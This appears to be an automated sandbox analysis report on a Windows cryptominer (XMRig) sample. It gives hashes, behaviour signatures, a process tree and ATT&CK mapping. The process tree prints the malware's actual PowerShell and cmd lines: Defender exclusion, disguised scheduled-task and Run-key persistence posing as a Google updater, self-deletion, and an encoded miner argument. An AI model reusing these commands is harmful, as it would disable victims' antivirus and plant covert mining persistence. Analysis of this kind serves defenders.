Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    456s
  • max time network
    1790s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/JqLvG94UkYjhxAeg.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 29 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 30 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1092
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\JqLvG94UkYjhxAeg.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\JqLvG94UkYjhxAeg.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:3052
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2316
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\JqLvG94UkYjhxAeg.exe"
        2⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:2596
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2576
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2336
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:280
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:864
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:1204
      • C:\Windows\System32\conhost.exe
        C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2276
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        2⤵
        • Drops file in Program Files directory
        PID:2032
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        2⤵
        • Drops file in Program Files directory
        • Suspicious use of WriteProcessMemory
        PID:1192
      • C:\Windows\System32\conhost.exe
        C:\Windows\System32\conhost.exe qtdiqnkejoz
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious behavior: EnumeratesProcesses
        PID:1084
    • C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
      1⤵
      • Creates scheduled task(s)
      PID:2176
    • C:\Windows\System32\choice.exe
      choice /C Y /N /D Y /T 3
      1⤵
        PID:3008
      • C:\Program Files\Google\Chrome\updater.exe
        "C:\Program Files\Google\Chrome\updater.exe"
        1⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2916
      • C:\Windows\system32\taskeng.exe
        taskeng.exe {31006620-FC86-4B79-9ADC-FE143AF99696} S-1-5-18:NT AUTHORITY\System:Service:
        1⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2548
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
        1⤵
          PID:304
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic PATH Win32_VideoController GET Name, VideoProcessor
          1⤵
          • Detects videocard installed
          • Modifies data under HKEY_USERS
          • Suspicious use of AdjustPrivilegeToken
          PID:1944

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Execution

        Scheduled Task/Job

        1
        T1053

        Persistence

        Scheduled Task/Job

        1
        T1053

        Privilege Escalation

        Scheduled Task/Job

        1
        T1053

        Discovery

        System Information Discovery

        1
        T1082

        Query Registry

        1
        T1012

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          163KB

          MD5

          817221fbd4f55e4650fa57eaee74cd3c

          SHA1

          20dfacab2c66cd757b1d3745e2db504c79180bc4

          SHA256

          ab3d9b9729864cc89e1afa85412094e0bf5cfbdcbff226ab98bf70d5eecd818a

          SHA512

          93e1b5fbf5868abf147d65543b6dfc08b06345de578c4bf998be575ae19c18cf00d5698ad554065ebf660fa2cbe760e61cf084d6257f0c4f4bcae17d0ffb6597

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          130KB

          MD5

          2ff6d7593e116e38742cde7f4e993096

          SHA1

          847e43fb142f3f3caaed881b5164a5588dbf7d43

          SHA256

          a6ce367c02ebda75d515c774cd37b8df32ac34219818ec9e7911ceebff410949

          SHA512

          390a15d0798d4f3e35f1bffa1df8ab6ba15f84e1a06899443f140684732bc6c8e3ac34f9a84642715ebf8e46dc13701d4fb3c8b267e8f66247c072ec6a5bef4d

        • C:\Program Files\Google\Libs\g.log
          Filesize

          198B

          MD5

          37dd19b2be4fa7635ad6a2f3238c4af1

          SHA1

          e5b2c034636b434faee84e82e3bce3a3d3561943

          SHA256

          8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

          SHA512

          86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          64737fe1c4de01fe6d0970b7ee088ac4

          SHA1

          87e850890be88533a4bdcb2eb7831da8d778dff7

          SHA256

          809ef564b24eb3212a3f937fa694da19a88d93717448d8463f9835de379337c8

          SHA512

          1e90af6cd3f7a65b0bca63b1020d70b20c9a05cdc3948f577d82148d53f35653f49350a1af9acc4925aa8f42dd609da14fde2167849e6989f9dc8560516b3d20

        • \Program Files\Google\Chrome\updater.exe
          Filesize

          112KB

          MD5

          43a2f634e72d25102360b0df0f4c0523

          SHA1

          3024537de6c965f0ec3ad3bb50621230769d1b70

          SHA256

          a5c5d3335ce88b546dbd9a87a2da081e323be710a77c62ee298101d05c7d71cc

          SHA512

          a09e5594fcd6ce4c7346b7a7cb6fe03a639cbb7e478d50c5dc533dad819e6cfa337b64b2f3286baf98fc0030f9c52603e0b18e1266c7b18f62ccab4a52c30f54

        • memory/280-51-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp
          Filesize

          9.6MB

        • memory/280-46-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp
          Filesize

          9.6MB

        • memory/280-48-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp
          Filesize

          9.6MB

        • memory/280-49-0x00000000014B0000-0x0000000001530000-memory.dmp
          Filesize

          512KB

        • memory/280-50-0x00000000014BB000-0x0000000001522000-memory.dmp
          Filesize

          412KB

        • memory/280-47-0x00000000014B0000-0x0000000001530000-memory.dmp
          Filesize

          512KB

        • memory/864-56-0x0000000001480000-0x0000000001500000-memory.dmp
          Filesize

          512KB

        • memory/864-57-0x0000000001480000-0x0000000001500000-memory.dmp
          Filesize

          512KB

        • memory/864-55-0x0000000001480000-0x0000000001500000-memory.dmp
          Filesize

          512KB

        • memory/864-54-0x000007FEF6270000-0x000007FEF6C0D000-memory.dmp
          Filesize

          9.6MB

        • memory/864-58-0x000007FEF6270000-0x000007FEF6C0D000-memory.dmp
          Filesize

          9.6MB

        • memory/864-52-0x000007FEF6270000-0x000007FEF6C0D000-memory.dmp
          Filesize

          9.6MB

        • memory/864-53-0x0000000001480000-0x0000000001500000-memory.dmp
          Filesize

          512KB

        • memory/1084-70-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/1084-76-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/2276-89-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-67-0x0000000000040000-0x0000000000060000-memory.dmp
          Filesize

          128KB

        • memory/2276-129-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-127-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-125-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-123-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-121-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-119-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-117-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-115-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-113-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-111-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-109-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-107-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-105-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-103-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-101-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-74-0x0000000000260000-0x0000000000280000-memory.dmp
          Filesize

          128KB

        • memory/2276-66-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-99-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-97-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-95-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-93-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-91-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-87-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-85-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-69-0x00000000002C0000-0x00000000002E0000-memory.dmp
          Filesize

          128KB

        • memory/2276-68-0x0000000000260000-0x0000000000280000-memory.dmp
          Filesize

          128KB

        • memory/2276-83-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-81-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-79-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-77-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-71-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-73-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2276-75-0x00000000002C0000-0x00000000002E0000-memory.dmp
          Filesize

          128KB

        • memory/2316-9-0x000007FEF6270000-0x000007FEF6C0D000-memory.dmp
          Filesize

          9.6MB

        • memory/2316-12-0x000000000286B000-0x00000000028D2000-memory.dmp
          Filesize

          412KB

        • memory/2316-8-0x0000000002860000-0x00000000028E0000-memory.dmp
          Filesize

          512KB

        • memory/2316-6-0x00000000027A0000-0x00000000027A8000-memory.dmp
          Filesize

          32KB

        • memory/2316-13-0x000007FEF6270000-0x000007FEF6C0D000-memory.dmp
          Filesize

          9.6MB

        • memory/2316-5-0x000000001B550000-0x000000001B832000-memory.dmp
          Filesize

          2.9MB

        • memory/2316-10-0x0000000002860000-0x00000000028E0000-memory.dmp
          Filesize

          512KB

        • memory/2316-7-0x000007FEF6270000-0x000007FEF6C0D000-memory.dmp
          Filesize

          9.6MB

        • memory/2316-11-0x0000000002860000-0x00000000028E0000-memory.dmp
          Filesize

          512KB

        • memory/2336-20-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp
          Filesize

          9.6MB

        • memory/2336-26-0x0000000002B20000-0x0000000002BA0000-memory.dmp
          Filesize

          512KB

        • memory/2336-27-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp
          Filesize

          9.6MB

        • memory/2336-23-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp
          Filesize

          9.6MB

        • memory/2336-19-0x000000001B4B0000-0x000000001B792000-memory.dmp
          Filesize

          2.9MB

        • memory/2336-24-0x0000000002B20000-0x0000000002BA0000-memory.dmp
          Filesize

          512KB

        • memory/2336-21-0x0000000002B20000-0x0000000002BA0000-memory.dmp
          Filesize

          512KB

        • memory/2336-22-0x00000000028D0000-0x00000000028D8000-memory.dmp
          Filesize

          32KB

        • memory/2336-25-0x0000000002B20000-0x0000000002BA0000-memory.dmp
          Filesize

          512KB

        • memory/2576-41-0x000007FEF6270000-0x000007FEF6C0D000-memory.dmp
          Filesize

          9.6MB

        • memory/2576-35-0x000007FEF6270000-0x000007FEF6C0D000-memory.dmp
          Filesize

          9.6MB

        • memory/2576-37-0x000007FEF6270000-0x000007FEF6C0D000-memory.dmp
          Filesize

          9.6MB

        • memory/2576-38-0x00000000027E4000-0x00000000027E7000-memory.dmp
          Filesize

          12KB

        • memory/2576-40-0x00000000027E0000-0x0000000002860000-memory.dmp
          Filesize

          512KB

        • memory/2576-39-0x00000000027E0000-0x0000000002860000-memory.dmp
          Filesize

          512KB

        • memory/2576-36-0x00000000027E0000-0x0000000002860000-memory.dmp
          Filesize

          512KB

        • memory/2916-45-0x000000013FB10000-0x000000013FD21000-memory.dmp
          Filesize

          2.1MB

        • memory/2916-65-0x000000013FB10000-0x000000013FD21000-memory.dmp
          Filesize

          2.1MB

        • memory/3052-0-0x000000013FE40000-0x0000000140051000-memory.dmp
          Filesize

          2.1MB

        • memory/3052-29-0x000000013FE40000-0x0000000140051000-memory.dmp
          Filesize

          2.1MB